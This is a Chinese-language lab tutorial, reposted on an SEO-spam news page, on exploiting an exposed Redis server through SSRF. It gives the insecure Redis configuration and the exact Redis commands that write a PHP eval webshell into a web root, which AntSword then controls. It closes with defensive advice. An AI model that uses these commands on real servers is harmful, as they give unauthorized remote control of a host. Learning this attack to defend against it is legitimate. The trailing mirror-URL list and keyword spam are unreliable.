当前位置: 首页 > news >正文 郑州网站推广公司asp.net网站部署教程 news 2025/10/28 17:55:39 郑州网站推广公司,asp.net网站部署教程,网站建设电话邀约话术,不用ftp做网站目录 前言 SSRF 漏洞深度剖析 Redis#xff1a;强大的内存数据库 Redis 产生漏洞的原因 SSRF 漏洞利用 Redis 实战步骤 准备环境 下载安装 Redis 配置漏洞环境 启动 Redis 攻击机远程连接 Redis 利用 Redis 写 Webshell 防范措施 前言 在网络安全领域#xff0…目录 前言 SSRF 漏洞深度剖析 Redis强大的内存数据库 Redis 产生漏洞的原因 SSRF 漏洞利用 Redis 实战步骤 准备环境 下载安装 Redis 配置漏洞环境 启动 Redis 攻击机远程连接 Redis 利用 Redis 写 Webshell 防范措施 前言 在网络安全领域SSRF漏洞与Redis结合的攻击极具威胁。本文先介绍SSRF和Redis概念、Redis作用及产生漏洞原因接着详细呈现利用SSRF漏洞操控Redis写入Webshell的实战步骤最后给出针对性防范措施助你提升网络安全防护能力。 SSRF 漏洞深度剖析 SSRFServer - Side Request Forgery服务器端请求伪造是一种源于服务器端的安全漏洞。正常情况下服务器端会根据用户的请求去访问其他服务器资源。但在存在 SSRF 漏洞时攻击者可以通过精心构造恶意请求让服务器以自身的身份去访问那些本不该访问的资源比如内网的敏感服务、未授权的外部链接等。这就好比攻击者披上了服务器的 “外衣”借助服务器的权限来实现自己的恶意目的而服务器往往对这种伪装毫无察觉。 Redis强大的内存数据库 RedisRemote Dictionary Server是一款基于内存的开源键值对存储数据库以其高性能、低延迟而闻名。它支持多种数据结构如字符串、哈希表、列表、集合等这使得它在各种应用场景中都能大显身手。Redis 主要有以下作用 缓存数据在 Web 应用中将频繁访问的数据存储在 Redis 中大大减少数据库的负载提高系统响应速度。例如电商网站的商品信息、用户登录状态等都可以缓存到 Redis 中。消息队列利用 Redis 的列表数据结构可以实现简单高效的消息队列。生产者将消息发送到队列中消费者从队列中获取消息进行处理常用于异步任务处理、日志收集等场景。分布式锁在分布式系统中通过 Redis 的原子操作来实现分布式锁确保同一时间只有一个节点能够执行特定的任务避免数据冲突和不一致。 Redis 产生漏洞的原因 配置不当如本文实战中将 Redis 绑定到 0.0.0.0这意味着 Redis 可以接受来自任何 IP 地址的连接请求。同时关闭保护模式使得 Redis 失去了基本的安全防护攻击者可以轻易连接到 Redis 服务。未授权访问如果 Redis 没有设置密码或者密码过于简单攻击者就能够直接访问 Redis执行各种命令包括修改配置、写入恶意数据等。与其他漏洞结合当 Redis 与存在 SSRF 漏洞的服务器结合时攻击者可以利用 SSRF 漏洞通过服务器间接控制 Redis绕过网络限制实现更复杂的攻击。 SSRF 漏洞利用 Redis 实战步骤 使用命令 wget http://download.redis.io/releases/redis-6.0.16.tar.gz #下载安装 Redis tar xf redis-6.0.16.tar.gz #解压下载的安装包 cd redis-6.0.16/ #进入解压后的 Redis 目录 make make install #编译安装 vim redis.conf #编辑redis文件 ./src/redis - server redis.conf #启动redis服务 redis - cli - h 10.0.0.107 - p 6379 #攻击机连接redis service apache2 start #开启apache netstat - tnulp #查看端口信息 config set dir /var/www/html/ #将 Redis 的持久化目录设置为 Web 服务器的根目录 config set dbfilename webshell.php #动态修改 Redis 服务器持久化文件的文件名 set webshell \n\n\n?php eval($_POST[123])? \n\n\n #向 Redis 中存储包含恶意代码的内容 save #触发 Redis 的持久化操作 准备环境 企业系统 kali 系统 200作为 Redis 服务的部署环境后续将成为攻击目标。在此系统上下载安装 Redis为漏洞利用提供基础。攻击机 kali 用于发起攻击操作模拟攻击者的视角执行一系列恶意操作。 下载安装 Redis 下载 Redis - 6.0.16使用wget命令从官方源下载安装包解压通过tar命令解压下载的压缩包为后续安装做准备进入 Redis 目录进入解压后的 Redis 目录准备进行编译安装编译安装执行make和make install命令完成 Redis 的编译和安装 配置漏洞环境 编辑 Redis 配置文件redis.conf进行危险配置 修改以下关键配置 bind 0.0.0.0 #允许任意IP连接使Redis暴露在公网风险中protected mode no #关闭保护模式执行命令不受限制 这样的配置使得 Redis 服务处于高度危险状态为攻击者提供了可乘之机。 启动 Redis 启动 Redis 服务使其监听默认端口 6379 攻击机远程连接 Redis 在攻击机上使用redis - cli命令连接到目标 Redis 服务 由于之前的危险配置攻击机无需任何验证即可成功连接到 Redis 服务这是攻击的第一步。 利用 Redis 写 Webshell 准备被攻击环境被攻击者 120在被攻击机上启动 Apache 网站服务为 Webshell 的写入提供环境 通过netstat命令检查服务启动情况确保 Apache 和 Redis 服务正常运行 写入 Webshell在攻击机连接的 Redis 客户端中执行一系列命令来写入 Webshell 这些命令依次将 Redis 的持久化目录设置为 Apache 网站根目录将持久化文件名设置为webshell.php设置包含恶意 PHP 代码的键值对并执行持久化操作从而在 Apache 网站根目录下生成一个可执行任意 PHP 代码的 Webshell 文件。 查看目标代码目录在被攻击机上查看/var/www/html/目录确认webshell.php文件已成功生成使用 AntSword 连接利用 AntSword 等 Webshell 管理工具配置连接地址为被攻击机的 IP 地址加上webshell.php路径密码为webshell中已写入的密码即可成功连接到目标服务器实现对服务器的远程控制执行系统命令、上传下载文件等操作。 防范措施 合理配置 Redis避免将 Redis 绑定到 0.0.0.0只绑定到内部可信的 IP 地址。启用保护模式protected mode yes并设置高强度密码通过requirepass配置项实现。输入验证与过滤对服务器端接收的所有用于发起请求的输入参数进行严格验证和过滤确保其符合预期格式和范围防止恶意构造。限制请求范围配置白名单限制服务器只能访问特定的域名和 IP 地址对于内部服务如 Redis确保只有授权服务器可以访问。定期更新软件保持 Redis 和服务器操作系统、相关软件的更新及时修复已知安全漏洞。 网络安全是一场持续的战斗了解 SSRF 漏洞利用 Redis 的攻击方式和防范措施是保障网络安全的重要一步。希望本文能帮助读者提升安全意识在实际应用中有效防范此类安全威胁。 文章转载自: http://www.morning.rjrnx.cn.gov.cn.rjrnx.cn http://www.morning.mnrqq.cn.gov.cn.mnrqq.cn http://www.morning.zympx.cn.gov.cn.zympx.cn http://www.morning.wjdgx.cn.gov.cn.wjdgx.cn http://www.morning.yrjkz.cn.gov.cn.yrjkz.cn http://www.morning.mm27.cn.gov.cn.mm27.cn http://www.morning.ckcjq.cn.gov.cn.ckcjq.cn http://www.morning.pprxs.cn.gov.cn.pprxs.cn http://www.morning.qhydkj.com.gov.cn.qhydkj.com http://www.morning.llthz.cn.gov.cn.llthz.cn http://www.morning.rwbh.cn.gov.cn.rwbh.cn http://www.morning.mxhcf.cn.gov.cn.mxhcf.cn http://www.morning.mtrfz.cn.gov.cn.mtrfz.cn http://www.morning.nspbj.cn.gov.cn.nspbj.cn http://www.morning.hxxzp.cn.gov.cn.hxxzp.cn http://www.morning.wmdbn.cn.gov.cn.wmdbn.cn http://www.morning.csznh.cn.gov.cn.csznh.cn http://www.morning.xdpjs.cn.gov.cn.xdpjs.cn http://www.morning.trfrl.cn.gov.cn.trfrl.cn http://www.morning.wztlr.cn.gov.cn.wztlr.cn http://www.morning.gjtdp.cn.gov.cn.gjtdp.cn http://www.morning.ggrzk.cn.gov.cn.ggrzk.cn http://www.morning.ykrkq.cn.gov.cn.ykrkq.cn http://www.morning.tphjl.cn.gov.cn.tphjl.cn http://www.morning.xclgf.cn.gov.cn.xclgf.cn http://www.morning.rfljb.cn.gov.cn.rfljb.cn http://www.morning.hwnnh.cn.gov.cn.hwnnh.cn http://www.morning.dmcqy.cn.gov.cn.dmcqy.cn http://www.morning.nmfwm.cn.gov.cn.nmfwm.cn http://www.morning.kmbgl.cn.gov.cn.kmbgl.cn http://www.morning.lwzpp.cn.gov.cn.lwzpp.cn http://www.morning.hjjhjhj.com.gov.cn.hjjhjhj.com http://www.morning.jcyrs.cn.gov.cn.jcyrs.cn http://www.morning.lgtcg.cn.gov.cn.lgtcg.cn http://www.morning.zkpwk.cn.gov.cn.zkpwk.cn http://www.morning.bxbkq.cn.gov.cn.bxbkq.cn http://www.morning.wctqc.cn.gov.cn.wctqc.cn http://www.morning.plpqf.cn.gov.cn.plpqf.cn http://www.morning.smszt.com.gov.cn.smszt.com http://www.morning.kzpy.cn.gov.cn.kzpy.cn http://www.morning.xxzjb.cn.gov.cn.xxzjb.cn http://www.morning.tkyxl.cn.gov.cn.tkyxl.cn http://www.morning.kryxk.cn.gov.cn.kryxk.cn http://www.morning.wmdbn.cn.gov.cn.wmdbn.cn http://www.morning.yxnfd.cn.gov.cn.yxnfd.cn http://www.morning.dfkby.cn.gov.cn.dfkby.cn http://www.morning.tgtrk.cn.gov.cn.tgtrk.cn http://www.morning.xrwbc.cn.gov.cn.xrwbc.cn http://www.morning.mgskc.cn.gov.cn.mgskc.cn http://www.morning.cpctr.cn.gov.cn.cpctr.cn http://www.morning.jfqpc.cn.gov.cn.jfqpc.cn http://www.morning.njhyk.cn.gov.cn.njhyk.cn http://www.morning.hfytgp.cn.gov.cn.hfytgp.cn http://www.morning.ptwzy.cn.gov.cn.ptwzy.cn http://www.morning.skbkq.cn.gov.cn.skbkq.cn http://www.morning.tkkjl.cn.gov.cn.tkkjl.cn http://www.morning.errnull.com.gov.cn.errnull.com http://www.morning.fwqgy.cn.gov.cn.fwqgy.cn http://www.morning.byshd.cn.gov.cn.byshd.cn http://www.morning.qftzk.cn.gov.cn.qftzk.cn http://www.morning.lwgrf.cn.gov.cn.lwgrf.cn http://www.morning.gnghp.cn.gov.cn.gnghp.cn http://www.morning.gswfs.cn.gov.cn.gswfs.cn http://www.morning.jsphr.cn.gov.cn.jsphr.cn http://www.morning.xrtsx.cn.gov.cn.xrtsx.cn http://www.morning.kpgbz.cn.gov.cn.kpgbz.cn http://www.morning.hrtwt.cn.gov.cn.hrtwt.cn http://www.morning.ktbjk.cn.gov.cn.ktbjk.cn http://www.morning.fbjqq.cn.gov.cn.fbjqq.cn http://www.morning.cjwkf.cn.gov.cn.cjwkf.cn http://www.morning.sqgsx.cn.gov.cn.sqgsx.cn http://www.morning.kyytt.cn.gov.cn.kyytt.cn http://www.morning.djxnn.cn.gov.cn.djxnn.cn http://www.morning.nrwr.cn.gov.cn.nrwr.cn http://www.morning.rmjxp.cn.gov.cn.rmjxp.cn http://www.morning.shuanga.com.cn.gov.cn.shuanga.com.cn http://www.morning.wqcbr.cn.gov.cn.wqcbr.cn http://www.morning.jzfrl.cn.gov.cn.jzfrl.cn http://www.morning.dtgjt.cn.gov.cn.dtgjt.cn http://www.morning.ghlyy.cn.gov.cn.ghlyy.cn 查看全文 http://www.tj-hxxt.cn/news/257298.html 相关文章: 常德网站建设求职简历商标网官方查询官网 网站开发怎么谈客户搜寻的网站有哪些 北海市住房和城乡建设局网站哈尔滨快速建站服务 58同城长沙回收网站建设采集类淘宝客网站怎么做 去哪里购买网站空间百度快速收录软件 北京网站建设公司哪家好长沙协会网站设计专业服务 凡科网免费网站域名注册钢材网站建设 用liferay做的网站网页制作与设计 怎样做网站的优化、排名理卖做各视频网站的会员 做网站要写代码吗网站开发绑定qq 17来做网站怎么做页码 做书网站 时光电子商务网站建设 教材 网站建设编程wordpress4.9.1加速 网络推广外包公司排名企业网站建设与优化 做网站只买一个程序免费的短视频素材库 网站弹窗怎么做两学一做网站网址大全 做网站费用入什么科目html点餐网页简单代码 医院网站建设方案计划书手机app开发网站模板 网站怎么挣钱杭州学编程哪里的培训机构好 手机网站开发开发马鞍山网站建设公司排名 个人网站主页怎么做汉中建筑信息平台 有没有教做零食的网站万全网站建设 网站开发z亿玛酷1专注邢台网站制作费用 哈尔滨网站运营服务商百度seo多少钱一个月 杭州网站设计询问蓝韵网络网站建设 系统维护 水木网站建设最新wordpress电商主题 北京建网站公司怎么样wordpress 主页模板 德州市住房和城乡建设局网站wordpress 侧栏 网站介绍模板开发软件需要什么软件 重庆seo网站推广费用怎么做 代刷网站
